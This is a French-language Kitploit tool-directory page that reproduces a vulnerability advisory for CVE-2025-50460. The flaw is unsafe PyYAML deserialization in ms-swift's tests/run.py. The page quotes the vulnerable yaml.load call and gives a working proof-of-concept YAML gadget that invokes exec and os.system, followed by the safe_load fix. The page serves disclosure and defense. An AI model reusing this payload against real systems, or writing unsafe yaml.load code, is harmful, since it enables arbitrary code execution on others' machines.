Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-50460 — Détails techniques et exploit pour CVE-2025-50460 | Kitploit
Outils/GitHubGitHub/anchor0221/cve-2025-50460
Analyse StatiqueAnalyse des VulnérabilitésAnalyse de CodeExploitationArticles et RechercheApprentissage et Éducation
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Détails techniques et exploit pour CVE-2025-50460

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-50460 : Exécution de code à distance dans modelscope/ms-swift via une désérialisation PyYAML non sécurisée

Statut : En attente d'analyse
Cet enregistrement CVE a été marqué pour les efforts d'enrichissement de la NVD.

Une vulnérabilité d'exécution de code à distance (RCE) existe dans le projet ms-swift version 3.3.0 en raison d'une désérialisation non sécurisée dans tests/run.py utilisant yaml.load() de la bibliothèque PyYAML (versions ≤ 5.3.1). Si un attaquant peut contrôler le contenu du fichier de configuration YAML passé au paramètre --run_config, du code arbitraire peut être exécuté pendant la désérialisation. Cela peut entraîner un compromis total du système. La vulnérabilité est déclenchée lorsqu'un fichier YAML malveillant est chargé, permettant l'exécution de commandes Python arbitraires telles que os.system(). Il est recommandé de mettre à niveau PyYAML vers la version 5.4 ou ultérieure, et d'utiliser yaml.safe_load() pour atténuer le problème.

Description

Une vulnérabilité d'exécution de code à distance (RCE) existe dans le projet modelscope/ms-swift en raison de l'utilisation non sécurisée de yaml.load() combinée à des versions vulnérables de la bibliothèque PyYAML (≤ 5.3.1). Le problème se situe dans le script tests/run.py, où un fichier de configuration YAML fourni par l'utilisateur est désérialisé à l'aide de yaml.load() avec yaml.FullLoader.

Télécharger l’outil

Si un attaquant peut contrôler ou remplacer le fichier de configuration YAML fourni à l'argument --run_config, il peut injecter une charge utile malveillante entraînant l'exécution de code arbitraire.

Dépôt affecté

  • Projet : modelscope/ms-swift
  • Versions affectées : dernière
  • Fichier : tests/run.py
  • Lien GitHub permanent : https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dépendance : PyYAML <= 5.3.1

Code vulnérable

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Preuve de concept (PoC)

Étape 1 : Créer un fichier YAML malveillant (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Étape 2 : Exécuter avec PyYAML vulnérable (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Cela entraîne l'exécution de os.system, prouvant l'exécution de code.

Atténuation

  • Remplacer yaml.load() par yaml.safe_load()
  • Mettre à niveau PyYAML vers la version 5.4 ou ultérieure

Exemple de correctif :

root@kitploit:~
# Avant
yaml.load(f, Loader=yaml.FullLoader)

# Après
yaml.safe_load(f)

Statut CVE

ChampValeur
CVE IDCVE-2025-50460
Score CVSSÀ déterminer
CWECWE-502 : Désérialisation de données non fiables
Date de signalement2025-04-25
Date de divulgation2025-07-30
Version affectéedernière
Version corrigée

Auteurs

  • Découvert par : Yu Rong (戎誉) et Hao Fan (凡浩)
  • Contact : [[email protected]]